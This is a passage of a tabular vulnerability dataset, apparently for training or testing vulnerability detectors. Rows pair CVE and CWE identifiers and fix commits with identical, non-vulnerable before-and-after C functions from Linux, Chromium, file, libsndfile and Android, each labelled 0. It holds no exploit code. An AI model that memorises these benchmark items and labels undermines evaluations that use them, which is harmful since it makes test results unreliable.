CVE ID | CVE Page | CWE ID | codeLink | commit_id | commit_message | func_after | func_before | lang | project | vul |
---|---|---|---|---|---|---|---|---|---|---|
CVE-2017-1000249 | https://www.cvedetails.com/cve/CVE-2017-1000249/ | CWE-119 | https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d | 9611f31313a93aa036389c5f3b15eea53510d4d | Extend build-id reporting to 8-byte IDs that lld can generate (Ed Maste) | dophn_exec(struct magic_set *ms, int clazz, int swap, int fd, off_t off,
int num, size_t size, off_t fsize, int sh_num, int *flags,
uint16_t *notecount)
{
Elf32_Phdr ph32;
Elf64_Phdr ph64;
const char *linking_style = "statically";
const char *interp = "";
unsigned char nbuf[BUFSIZ];
char ibuf[BUFSIZ];
ssize_t bufsize;
size_t offset, align, len;
if (size != xph_sizeof) {
if (file_printf(ms, ", corrupted program header size") == -1)
return -1;
return 0;
}
for ( ; num; num--) {
if (pread(fd, xph_addr, xph_sizeof, off) < (ssize_t)xph_sizeof) {
file_badread(ms);
return -1;
}
off += size;
bufsize = 0;
align = 4;
/* Things we can determine before we seek */
switch (xph_type) {
case PT_DYNAMIC:
linking_style = "dynamically";
break;
case PT_NOTE:
if (sh_num) /* Did this through section headers */
continue;
if (((align = xph_align) & 0x80000000UL) != 0 ||
align < 4) {
if (file_printf(ms,
", invalid note alignment 0x%lx",
(unsigned long)align) == -1)
return -1;
align = 4;
}
/*FALLTHROUGH*/
case PT_INTERP:
len = xph_filesz < sizeof(nbuf) ? xph_filesz
: sizeof(nbuf);
bufsize = pread(fd, nbuf, len, xph_offset);
if (bufsize == -1) {
file_badread(ms);
return -1;
}
break;
default:
if (fsize != SIZE_UNKNOWN && xph_offset > fsize) {
/* Maybe warn here? */
continue;
}
break;
}
/* Things we can determine when we seek */
switch (xph_type) {
case PT_INTERP:
if (bufsize && nbuf[0]) {
nbuf[bufsize - 1] = '\0';
interp = (const char *)nbuf;
} else
interp = "*empty*";
break;
case PT_NOTE:
/*
* This is a PT_NOTE section; loop through all the notes
* in the section.
*/
offset = 0;
for (;;) {
if (offset >= (size_t)bufsize)
break;
offset = donote(ms, nbuf, offset,
(size_t)bufsize, clazz, swap, align,
flags, notecount, fd, 0, 0, 0);
if (offset == 0)
break;
}
break;
default:
break;
}
}
if (file_printf(ms, ", %s linked", linking_style)
== -1)
return -1;
if (interp[0])
if (file_printf(ms, ", interpreter %s",
file_printable(ibuf, sizeof(ibuf), interp)) == -1)
return -1;
return 0;
}
| dophn_exec(struct magic_set *ms, int clazz, int swap, int fd, off_t off,
int num, size_t size, off_t fsize, int sh_num, int *flags,
uint16_t *notecount)
{
Elf32_Phdr ph32;
Elf64_Phdr ph64;
const char *linking_style = "statically";
const char *interp = "";
unsigned char nbuf[BUFSIZ];
char ibuf[BUFSIZ];
ssize_t bufsize;
size_t offset, align, len;
if (size != xph_sizeof) {
if (file_printf(ms, ", corrupted program header size") == -1)
return -1;
return 0;
}
for ( ; num; num--) {
if (pread(fd, xph_addr, xph_sizeof, off) < (ssize_t)xph_sizeof) {
file_badread(ms);
return -1;
}
off += size;
bufsize = 0;
align = 4;
/* Things we can determine before we seek */
switch (xph_type) {
case PT_DYNAMIC:
linking_style = "dynamically";
break;
case PT_NOTE:
if (sh_num) /* Did this through section headers */
continue;
if (((align = xph_align) & 0x80000000UL) != 0 ||
align < 4) {
if (file_printf(ms,
", invalid note alignment 0x%lx",
(unsigned long)align) == -1)
return -1;
align = 4;
}
/*FALLTHROUGH*/
case PT_INTERP:
len = xph_filesz < sizeof(nbuf) ? xph_filesz
: sizeof(nbuf);
bufsize = pread(fd, nbuf, len, xph_offset);
if (bufsize == -1) {
file_badread(ms);
return -1;
}
break;
default:
if (fsize != SIZE_UNKNOWN && xph_offset > fsize) {
/* Maybe warn here? */
continue;
}
break;
}
/* Things we can determine when we seek */
switch (xph_type) {
case PT_INTERP:
if (bufsize && nbuf[0]) {
nbuf[bufsize - 1] = '\0';
interp = (const char *)nbuf;
} else
interp = "*empty*";
break;
case PT_NOTE:
/*
* This is a PT_NOTE section; loop through all the notes
* in the section.
*/
offset = 0;
for (;;) {
if (offset >= (size_t)bufsize)
break;
offset = donote(ms, nbuf, offset,
(size_t)bufsize, clazz, swap, align,
flags, notecount, fd, 0, 0, 0);
if (offset == 0)
break;
}
break;
default:
break;
}
}
if (file_printf(ms, ", %s linked", linking_style)
== -1)
return -1;
if (interp[0])
if (file_printf(ms, ", interpreter %s",
file_printable(ibuf, sizeof(ibuf), interp)) == -1)
return -1;
return 0;
}
| C | file | 0 |
CVE-2017-15128 | https://www.cvedetails.com/cve/CVE-2017-15128/ | CWE-119 | https://github.com/torvalds/linux/commit/1e3921471354244f70fe268586ff94a97a6dd4df | 1e3921471354244f70fe268586ff94a97a6dd4df | userfaultfd: hugetlbfs: prevent UFFDIO_COPY to fill beyond the end of i_size
This oops:
kernel BUG at fs/hugetlbfs/inode.c:484!
RIP: remove_inode_hugepages+0x3d0/0x410
Call Trace:
hugetlbfs_setattr+0xd9/0x130
notify_change+0x292/0x410
do_truncate+0x65/0xa0
do_sys_ftruncate.constprop.3+0x11a/0x180
SyS_ftruncate+0xe/0x10
tracesys+0xd9/0xde
was caused by the lack of i_size check in hugetlb_mcopy_atomic_pte.
mmap() can still succeed beyond the end of the i_size after vmtruncate
zapped vmas in those ranges, but the faults must not succeed, and that
includes UFFDIO_COPY.
We could differentiate the retval to userland to represent a SIGBUS like
a page fault would do (vs SIGSEGV), but it doesn't seem very useful and
we'd need to pick a random retval as there's no meaningful syscall
retval that would differentiate from SIGSEGV and SIGBUS, there's just
-EFAULT.
Link: http://lkml.kernel.org/r/20171016223914.2421-2-aarcange@redhat.com
Signed-off-by: Andrea Arcangeli <aarcange@redhat.com>
Reviewed-by: Mike Kravetz <mike.kravetz@oracle.com>
Cc: Mike Rapoport <rppt@linux.vnet.ibm.com>
Cc: "Dr. David Alan Gilbert" <dgilbert@redhat.com>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static ssize_t nr_overcommit_hugepages_store(struct kobject *kobj,
struct kobj_attribute *attr, const char *buf, size_t count)
{
int err;
unsigned long input;
struct hstate *h = kobj_to_hstate(kobj, NULL);
if (hstate_is_gigantic(h))
return -EINVAL;
err = kstrtoul(buf, 10, &input);
if (err)
return err;
spin_lock(&hugetlb_lock);
h->nr_overcommit_huge_pages = input;
spin_unlock(&hugetlb_lock);
return count;
}
| static ssize_t nr_overcommit_hugepages_store(struct kobject *kobj,
struct kobj_attribute *attr, const char *buf, size_t count)
{
int err;
unsigned long input;
struct hstate *h = kobj_to_hstate(kobj, NULL);
if (hstate_is_gigantic(h))
return -EINVAL;
err = kstrtoul(buf, 10, &input);
if (err)
return err;
spin_lock(&hugetlb_lock);
h->nr_overcommit_huge_pages = input;
spin_unlock(&hugetlb_lock);
return count;
}
| C | linux | 0 |
CVE-2014-9756 | https://www.cvedetails.com/cve/CVE-2014-9756/ | CWE-189 | https://github.com/erikd/libsndfile/commit/725c7dbb95bfaf8b4bb7b04820e3a00cceea9ce6 | 725c7dbb95bfaf8b4bb7b04820e3a00cceea9ce6 | src/file_io.c : Prevent potential divide-by-zero.
Closes: https://github.com/erikd/libsndfile/issues/92 | psf_close_handle (HANDLE handle)
{ if (handle == NULL)
return 0 ;
if (CloseHandle (handle) == 0)
return -1 ;
return 0 ;
} /* psf_close_handle */
| psf_close_handle (HANDLE handle)
{ if (handle == NULL)
return 0 ;
if (CloseHandle (handle) == 0)
return -1 ;
return 0 ;
} /* psf_close_handle */
| C | libsndfile | 0 |
CVE-2014-1743 | https://www.cvedetails.com/cve/CVE-2014-1743/ | CWE-399 | https://github.com/chromium/chromium/commit/6d9425ec7badda912555d46ea7abcfab81fdd9b9 | 6d9425ec7badda912555d46ea7abcfab81fdd9b9 | sync compositor: pass simple gfx types by const ref
See bug for reasoning
BUG=159273
Review URL: https://codereview.chromium.org/1417893006
Cr-Commit-Position: refs/heads/master@{#356653} | void AwContents::SetDipScale(JNIEnv* env, jobject obj, jfloat dip_scale) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
SetDipScaleInternal(dip_scale);
}
| void AwContents::SetDipScale(JNIEnv* env, jobject obj, jfloat dip_scale) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
SetDipScaleInternal(dip_scale);
}
| C | Chrome | 0 |
CVE-2012-2375 | https://www.cvedetails.com/cve/CVE-2012-2375/ | CWE-189 | https://github.com/torvalds/linux/commit/20e0fa98b751facf9a1101edaefbc19c82616a68 | 20e0fa98b751facf9a1101edaefbc19c82616a68 | Fix length of buffer copied in __nfs4_get_acl_uncached
_copy_from_pages() used to copy data from the temporary buffer to the
user passed buffer is passed the wrong size parameter when copying
data. res.acl_len contains both the bitmap and acl lenghts while
acl_len contains the acl length after adjusting for the bitmap size.
Signed-off-by: Sachin Prabhu <sprabhu@redhat.com>
Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com> | int nfs4_open_delegation_recall(struct nfs_open_context *ctx, struct nfs4_state *state, const nfs4_stateid *stateid)
{
struct nfs4_exception exception = { };
struct nfs_server *server = NFS_SERVER(state->inode);
int err;
do {
err = _nfs4_open_delegation_recall(ctx, state, stateid);
switch (err) {
case 0:
case -ENOENT:
case -ESTALE:
goto out;
case -NFS4ERR_BADSESSION:
case -NFS4ERR_BADSLOT:
case -NFS4ERR_BAD_HIGH_SLOT:
case -NFS4ERR_CONN_NOT_BOUND_TO_SESSION:
case -NFS4ERR_DEADSESSION:
nfs4_schedule_session_recovery(server->nfs_client->cl_session);
goto out;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_STALE_STATEID:
case -NFS4ERR_EXPIRED:
/* Don't recall a delegation if it was lost */
nfs4_schedule_lease_recovery(server->nfs_client);
goto out;
case -ERESTARTSYS:
/*
* The show must go on: exit, but mark the
* stateid as needing recovery.
*/
case -NFS4ERR_DELEG_REVOKED:
case -NFS4ERR_ADMIN_REVOKED:
case -NFS4ERR_BAD_STATEID:
nfs_inode_find_state_and_recover(state->inode,
stateid);
nfs4_schedule_stateid_recovery(server, state);
case -EKEYEXPIRED:
/*
* User RPCSEC_GSS context has expired.
* We cannot recover this stateid now, so
* skip it and allow recovery thread to
* proceed.
*/
case -ENOMEM:
err = 0;
goto out;
}
err = nfs4_handle_exception(server, err, &exception);
} while (exception.retry);
out:
return err;
}
| int nfs4_open_delegation_recall(struct nfs_open_context *ctx, struct nfs4_state *state, const nfs4_stateid *stateid)
{
struct nfs4_exception exception = { };
struct nfs_server *server = NFS_SERVER(state->inode);
int err;
do {
err = _nfs4_open_delegation_recall(ctx, state, stateid);
switch (err) {
case 0:
case -ENOENT:
case -ESTALE:
goto out;
case -NFS4ERR_BADSESSION:
case -NFS4ERR_BADSLOT:
case -NFS4ERR_BAD_HIGH_SLOT:
case -NFS4ERR_CONN_NOT_BOUND_TO_SESSION:
case -NFS4ERR_DEADSESSION:
nfs4_schedule_session_recovery(server->nfs_client->cl_session);
goto out;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_STALE_STATEID:
case -NFS4ERR_EXPIRED:
/* Don't recall a delegation if it was lost */
nfs4_schedule_lease_recovery(server->nfs_client);
goto out;
case -ERESTARTSYS:
/*
* The show must go on: exit, but mark the
* stateid as needing recovery.
*/
case -NFS4ERR_DELEG_REVOKED:
case -NFS4ERR_ADMIN_REVOKED:
case -NFS4ERR_BAD_STATEID:
nfs_inode_find_state_and_recover(state->inode,
stateid);
nfs4_schedule_stateid_recovery(server, state);
case -EKEYEXPIRED:
/*
* User RPCSEC_GSS context has expired.
* We cannot recover this stateid now, so
* skip it and allow recovery thread to
* proceed.
*/
case -ENOMEM:
err = 0;
goto out;
}
err = nfs4_handle_exception(server, err, &exception);
} while (exception.retry);
out:
return err;
}
| C | linux | 0 |
CVE-2016-9601 | https://www.cvedetails.com/cve/CVE-2016-9601/ | CWE-119 | http://git.ghostscript.com/?p=jbig2dec.git;a=commit;h=e698d5c11d27212aa1098bc5b1673a3378563092 | e698d5c11d27212aa1098bc5b1673a3378563092 | null | test_get_word(Jbig2WordStream *self, int offset, uint32_t *word)
{
/* assume test_stream[] is at least 4 bytes */
if (offset + 3 > sizeof(test_stream))
return -1;
*word = ((test_stream[offset] << 24) | (test_stream[offset + 1] << 16) | (test_stream[offset + 2] << 8) | (test_stream[offset + 3]));
return 0;
}
| test_get_word(Jbig2WordStream *self, int offset, uint32_t *word)
{
/* assume test_stream[] is at least 4 bytes */
if (offset + 3 > sizeof(test_stream))
return -1;
*word = ((test_stream[offset] << 24) | (test_stream[offset + 1] << 16) | (test_stream[offset + 2] << 8) | (test_stream[offset + 3]));
return 0;
}
| C | ghostscript | 0 |
CVE-2016-0850 | https://www.cvedetails.com/cve/CVE-2016-0850/ | CWE-264 | https://android.googlesource.com/platform/external/bluetooth/bluedroid/+/c677ee92595335233eb0e7b59809a1a94e7a678a | c677ee92595335233eb0e7b59809a1a94e7a678a | DO NOT MERGE Remove Porsche car-kit pairing workaround
Bug: 26551752
Change-Id: I14c5e3fcda0849874c8a94e48aeb7d09585617e1
| static BOOLEAN btm_sec_is_upgrade_possible(tBTM_SEC_DEV_REC *p_dev_rec, BOOLEAN is_originator)
{
UINT16 mtm_check = is_originator ? BTM_SEC_OUT_MITM : BTM_SEC_IN_MITM;
BOOLEAN is_possible = TRUE;
if (p_dev_rec->sec_flags & BTM_SEC_LINK_KEY_KNOWN)
{
is_possible = FALSE;
if(p_dev_rec->p_cur_service)
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible id:%d, link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, flags:x%x",
p_dev_rec->p_cur_service->service_id, p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps,
mtm_check, p_dev_rec->p_cur_service->security_flags);
}
else
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, ",
p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps, mtm_check);
}
/* Already have a link key to the connected peer. Is the link key secure enough?
** Is a link key upgrade even possible?
*/
if ((p_dev_rec->security_required & mtm_check) /* needs MITM */
&& (p_dev_rec->link_key_type == BTM_LKEY_TYPE_UNAUTH_COMB) /* has unauthenticated link key */
&& (p_dev_rec->rmt_io_caps < BTM_IO_CAP_MAX) /* a valid peer IO cap */
&& (btm_sec_io_map[p_dev_rec->rmt_io_caps][btm_cb.devcb.loc_io_caps])) /* authenticated link key is possible */
{
/* upgrade is possible: check if the application wants the upgrade.
* If the application is configured to use a global MITM flag,
* it probably would not want to upgrade the link key based on the security level database */
is_possible = TRUE;
}
}
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible is_possible:%d sec_flags:0x%x", is_possible, p_dev_rec->sec_flags);
return is_possible;
}
| static BOOLEAN btm_sec_is_upgrade_possible(tBTM_SEC_DEV_REC *p_dev_rec, BOOLEAN is_originator)
{
UINT16 mtm_check = is_originator ? BTM_SEC_OUT_MITM : BTM_SEC_IN_MITM;
BOOLEAN is_possible = TRUE;
if (p_dev_rec->sec_flags & BTM_SEC_LINK_KEY_KNOWN)
{
is_possible = FALSE;
if(p_dev_rec->p_cur_service)
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible id:%d, link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, flags:x%x",
p_dev_rec->p_cur_service->service_id, p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps,
mtm_check, p_dev_rec->p_cur_service->security_flags);
}
else
{
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible link_key_typet:%d, rmt_io_caps:%d, chk flags:x%x, ",
p_dev_rec->link_key_type, p_dev_rec->rmt_io_caps, mtm_check);
}
/* Already have a link key to the connected peer. Is the link key secure enough?
** Is a link key upgrade even possible?
*/
if ((p_dev_rec->security_required & mtm_check) /* needs MITM */
&& (p_dev_rec->link_key_type == BTM_LKEY_TYPE_UNAUTH_COMB) /* has unauthenticated link key */
&& (p_dev_rec->rmt_io_caps < BTM_IO_CAP_MAX) /* a valid peer IO cap */
&& (btm_sec_io_map[p_dev_rec->rmt_io_caps][btm_cb.devcb.loc_io_caps])) /* authenticated link key is possible */
{
/* upgrade is possible: check if the application wants the upgrade.
* If the application is configured to use a global MITM flag,
* it probably would not want to upgrade the link key based on the security level database */
is_possible = TRUE;
}
}
BTM_TRACE_DEBUG ("btm_sec_is_upgrade_possible is_possible:%d sec_flags:0x%x", is_possible, p_dev_rec->sec_flags);
return is_possible;
}
| C | Android | 0 |
CVE-2013-2861 | https://www.cvedetails.com/cve/CVE-2013-2861/ | CWE-399 | https://github.com/chromium/chromium/commit/508b89a64ab700aa09f21fc666a5588b47360eab | 508b89a64ab700aa09f21fc666a5588b47360eab | Upgrade old app host to new app launcher on startup
This patch is a continuation of https://codereview.chromium.org/16805002/.
BUG=248825
Review URL: https://chromiumcodereview.appspot.com/17022015
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@209604 0039d316-1c4b-4281-b951-d872f2087c98 | string16 GetAppListShortcutName() {
chrome::VersionInfo::Channel channel = chrome::VersionInfo::GetChannel();
if (channel == chrome::VersionInfo::CHANNEL_CANARY)
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME_CANARY);
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME);
}
| string16 GetAppListShortcutName() {
chrome::VersionInfo::Channel channel = chrome::VersionInfo::GetChannel();
if (channel == chrome::VersionInfo::CHANNEL_CANARY)
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME_CANARY);
return l10n_util::GetStringUTF16(IDS_APP_LIST_SHORTCUT_NAME);
}
| C | Chrome | 0 |
CVE-2015-9016 | https://www.cvedetails.com/cve/CVE-2015-9016/ | CWE-362 | https://github.com/torvalds/linux/commit/0048b4837affd153897ed1222283492070027aa9 | 0048b4837affd153897ed1222283492070027aa9 | blk-mq: fix race between timeout and freeing request
Inside timeout handler, blk_mq_tag_to_rq() is called
to retrieve the request from one tag. This way is obviously
wrong because the request can be freed any time and some
fiedds of the request can't be trusted, then kernel oops
might be triggered[1].
Currently wrt. blk_mq_tag_to_rq(), the only special case is
that the flush request can share same tag with the request
cloned from, and the two requests can't be active at the same
time, so this patch fixes the above issue by updating tags->rqs[tag]
with the active request(either flush rq or the request cloned
from) of the tag.
Also blk_mq_tag_to_rq() gets much simplified with this patch.
Given blk_mq_tag_to_rq() is mainly for drivers and the caller must
make sure the request can't be freed, so in bt_for_each() this
helper is replaced with tags->rqs[tag].
[1] kernel oops log
[ 439.696220] BUG: unable to handle kernel NULL pointer dereference at 0000000000000158^M
[ 439.697162] IP: [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.700653] PGD 7ef765067 PUD 7ef764067 PMD 0 ^M
[ 439.700653] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC ^M
[ 439.700653] Dumping ftrace buffer:^M
[ 439.700653] (ftrace buffer empty)^M
[ 439.700653] Modules linked in: nbd ipv6 kvm_intel kvm serio_raw^M
[ 439.700653] CPU: 6 PID: 2779 Comm: stress-ng-sigfd Not tainted 4.2.0-rc5-next-20150805+ #265^M
[ 439.730500] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011^M
[ 439.730500] task: ffff880605308000 ti: ffff88060530c000 task.ti: ffff88060530c000^M
[ 439.730500] RIP: 0010:[<ffffffff812d89ba>] [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.730500] RSP: 0018:ffff880819203da0 EFLAGS: 00010283^M
[ 439.730500] RAX: ffff880811b0e000 RBX: ffff8800bb465f00 RCX: 0000000000000002^M
[ 439.730500] RDX: 0000000000000000 RSI: 0000000000000202 RDI: 0000000000000000^M
[ 439.730500] RBP: ffff880819203db0 R08: 0000000000000002 R09: 0000000000000000^M
[ 439.730500] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000202^M
[ 439.730500] R13: ffff880814104800 R14: 0000000000000002 R15: ffff880811a2ea00^M
[ 439.730500] FS: 00007f165b3f5740(0000) GS:ffff880819200000(0000) knlGS:0000000000000000^M
[ 439.730500] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b^M
[ 439.730500] CR2: 0000000000000158 CR3: 00000007ef766000 CR4: 00000000000006e0^M
[ 439.730500] Stack:^M
[ 439.730500] 0000000000000008 ffff8808114eed90 ffff880819203e00 ffffffff812dc104^M
[ 439.755663] ffff880819203e40 ffffffff812d9f5e 0000020000000000 ffff8808114eed80^M
[ 439.755663] Call Trace:^M
[ 439.755663] <IRQ> ^M
[ 439.755663] [<ffffffff812dc104>] bt_for_each+0x6e/0xc8^M
[ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M
[ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M
[ 439.755663] [<ffffffff812dc1b3>] blk_mq_tag_busy_iter+0x55/0x5e^M
[ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M
[ 439.755663] [<ffffffff812d8911>] blk_mq_rq_timer+0x5d/0xd4^M
[ 439.755663] [<ffffffff810a3e10>] call_timer_fn+0xf7/0x284^M
[ 439.755663] [<ffffffff810a3d1e>] ? call_timer_fn+0x5/0x284^M
[ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M
[ 439.755663] [<ffffffff810a46d6>] run_timer_softirq+0x1ce/0x1f8^M
[ 439.755663] [<ffffffff8104c367>] __do_softirq+0x181/0x3a4^M
[ 439.755663] [<ffffffff8104c76e>] irq_exit+0x40/0x94^M
[ 439.755663] [<ffffffff81031482>] smp_apic_timer_interrupt+0x33/0x3e^M
[ 439.755663] [<ffffffff815559a4>] apic_timer_interrupt+0x84/0x90^M
[ 439.755663] <EOI> ^M
[ 439.755663] [<ffffffff81554350>] ? _raw_spin_unlock_irq+0x32/0x4a^M
[ 439.755663] [<ffffffff8106a98b>] finish_task_switch+0xe0/0x163^M
[ 439.755663] [<ffffffff8106a94d>] ? finish_task_switch+0xa2/0x163^M
[ 439.755663] [<ffffffff81550066>] __schedule+0x469/0x6cd^M
[ 439.755663] [<ffffffff8155039b>] schedule+0x82/0x9a^M
[ 439.789267] [<ffffffff8119b28b>] signalfd_read+0x186/0x49a^M
[ 439.790911] [<ffffffff8106d86a>] ? wake_up_q+0x47/0x47^M
[ 439.790911] [<ffffffff811618c2>] __vfs_read+0x28/0x9f^M
[ 439.790911] [<ffffffff8117a289>] ? __fget_light+0x4d/0x74^M
[ 439.790911] [<ffffffff811620a7>] vfs_read+0x7a/0xc6^M
[ 439.790911] [<ffffffff8116292b>] SyS_read+0x49/0x7f^M
[ 439.790911] [<ffffffff81554c17>] entry_SYSCALL_64_fastpath+0x12/0x6f^M
[ 439.790911] Code: 48 89 e5 e8 a9 b8 e7 ff 5d c3 0f 1f 44 00 00 55 89
f2 48 89 e5 41 54 41 89 f4 53 48 8b 47 60 48 8b 1c d0 48 8b 7b 30 48 8b
53 38 <48> 8b 87 58 01 00 00 48 85 c0 75 09 48 8b 97 88 0c 00 00 eb 10
^M
[ 439.790911] RIP [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M
[ 439.790911] RSP <ffff880819203da0>^M
[ 439.790911] CR2: 0000000000000158^M
[ 439.790911] ---[ end trace d40af58949325661 ]---^M
Cc: <stable@vger.kernel.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Signed-off-by: Jens Axboe <axboe@fb.com> | static inline bool blk_mq_merge_queue_io(struct blk_mq_hw_ctx *hctx,
struct blk_mq_ctx *ctx,
struct request *rq, struct bio *bio)
{
if (!hctx_allow_merges(hctx)) {
blk_mq_bio_to_request(rq, bio);
spin_lock(&ctx->lock);
insert_rq:
__blk_mq_insert_request(hctx, rq, false);
spin_unlock(&ctx->lock);
return false;
} else {
struct request_queue *q = hctx->queue;
spin_lock(&ctx->lock);
if (!blk_mq_attempt_merge(q, ctx, bio)) {
blk_mq_bio_to_request(rq, bio);
goto insert_rq;
}
spin_unlock(&ctx->lock);
__blk_mq_free_request(hctx, ctx, rq);
return true;
}
}
| static inline bool blk_mq_merge_queue_io(struct blk_mq_hw_ctx *hctx,
struct blk_mq_ctx *ctx,
struct request *rq, struct bio *bio)
{
if (!hctx_allow_merges(hctx)) {
blk_mq_bio_to_request(rq, bio);
spin_lock(&ctx->lock);
insert_rq:
__blk_mq_insert_request(hctx, rq, false);
spin_unlock(&ctx->lock);
return false;
} else {
struct request_queue *q = hctx->queue;
spin_lock(&ctx->lock);
if (!blk_mq_attempt_merge(q, ctx, bio)) {
blk_mq_bio_to_request(rq, bio);
goto insert_rq;
}
spin_unlock(&ctx->lock);
__blk_mq_free_request(hctx, ctx, rq);
return true;
}
}
| C | linux | 0 |
CVE-2013-1819 | https://www.cvedetails.com/cve/CVE-2013-1819/ | CWE-20 | https://github.com/torvalds/linux/commit/eb178619f930fa2ba2348de332a1ff1c66a31424 | eb178619f930fa2ba2348de332a1ff1c66a31424 | xfs: fix _xfs_buf_find oops on blocks beyond the filesystem end
When _xfs_buf_find is passed an out of range address, it will fail
to find a relevant struct xfs_perag and oops with a null
dereference. This can happen when trying to walk a filesystem with a
metadata inode that has a partially corrupted extent map (i.e. the
block number returned is corrupt, but is otherwise intact) and we
try to read from the corrupted block address.
In this case, just fail the lookup. If it is readahead being issued,
it will simply not be done, but if it is real read that fails we
will get an error being reported. Ideally this case should result
in an EFSCORRUPTED error being reported, but we cannot return an
error through xfs_buf_read() or xfs_buf_get() so this lookup failure
may result in ENOMEM or EIO errors being reported instead.
Signed-off-by: Dave Chinner <dchinner@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Ben Myers <bpm@sgi.com>
Signed-off-by: Ben Myers <bpm@sgi.com> | xfs_buf_ioend(
struct xfs_buf *bp,
int schedule)
{
bool read = !!(bp->b_flags & XBF_READ);
trace_xfs_buf_iodone(bp, _RET_IP_);
if (bp->b_error == 0)
bp->b_flags |= XBF_DONE;
if (bp->b_iodone || (read && bp->b_ops) || (bp->b_flags & XBF_ASYNC)) {
if (schedule) {
INIT_WORK(&bp->b_iodone_work, xfs_buf_iodone_work);
queue_work(xfslogd_workqueue, &bp->b_iodone_work);
} else {
xfs_buf_iodone_work(&bp->b_iodone_work);
}
} else {
bp->b_flags &= ~(XBF_READ | XBF_WRITE | XBF_READ_AHEAD);
complete(&bp->b_iowait);
}
}
| xfs_buf_ioend(
struct xfs_buf *bp,
int schedule)
{
bool read = !!(bp->b_flags & XBF_READ);
trace_xfs_buf_iodone(bp, _RET_IP_);
if (bp->b_error == 0)
bp->b_flags |= XBF_DONE;
if (bp->b_iodone || (read && bp->b_ops) || (bp->b_flags & XBF_ASYNC)) {
if (schedule) {
INIT_WORK(&bp->b_iodone_work, xfs_buf_iodone_work);
queue_work(xfslogd_workqueue, &bp->b_iodone_work);
} else {
xfs_buf_iodone_work(&bp->b_iodone_work);
}
} else {
bp->b_flags &= ~(XBF_READ | XBF_WRITE | XBF_READ_AHEAD);
complete(&bp->b_iowait);
}
}
| C | linux | 0 |
CVE-2012-6548 | https://www.cvedetails.com/cve/CVE-2012-6548/ | CWE-200 | https://github.com/torvalds/linux/commit/0143fc5e9f6f5aad4764801015bc8d4b4a278200 | 0143fc5e9f6f5aad4764801015bc8d4b4a278200 | udf: avoid info leak on export
For type 0x51 the udf.parent_partref member in struct fid gets copied
uninitialized to userland. Fix this by initializing it to 0.
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Jan Kara <jack@suse.cz> | static struct fileIdentDesc *udf_add_entry(struct inode *dir,
struct dentry *dentry,
struct udf_fileident_bh *fibh,
struct fileIdentDesc *cfi, int *err)
{
struct super_block *sb = dir->i_sb;
struct fileIdentDesc *fi = NULL;
unsigned char *name = NULL;
int namelen;
loff_t f_pos;
loff_t size = udf_ext0_offset(dir) + dir->i_size;
int nfidlen;
uint8_t lfi;
uint16_t liu;
int block;
struct kernel_lb_addr eloc;
uint32_t elen = 0;
sector_t offset;
struct extent_position epos = {};
struct udf_inode_info *dinfo;
fibh->sbh = fibh->ebh = NULL;
name = kmalloc(UDF_NAME_LEN, GFP_NOFS);
if (!name) {
*err = -ENOMEM;
goto out_err;
}
if (dentry) {
if (!dentry->d_name.len) {
*err = -EINVAL;
goto out_err;
}
namelen = udf_put_filename(sb, dentry->d_name.name, name,
dentry->d_name.len);
if (!namelen) {
*err = -ENAMETOOLONG;
goto out_err;
}
} else {
namelen = 0;
}
nfidlen = (sizeof(struct fileIdentDesc) + namelen + 3) & ~3;
f_pos = udf_ext0_offset(dir);
fibh->soffset = fibh->eoffset = f_pos & (dir->i_sb->s_blocksize - 1);
dinfo = UDF_I(dir);
if (dinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
if (inode_bmap(dir, f_pos >> dir->i_sb->s_blocksize_bits, &epos,
&eloc, &elen, &offset) != (EXT_RECORDED_ALLOCATED >> 30)) {
block = udf_get_lb_pblock(dir->i_sb,
&dinfo->i_location, 0);
fibh->soffset = fibh->eoffset = sb->s_blocksize;
goto add;
}
block = udf_get_lb_pblock(dir->i_sb, &eloc, offset);
if ((++offset << dir->i_sb->s_blocksize_bits) < elen) {
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
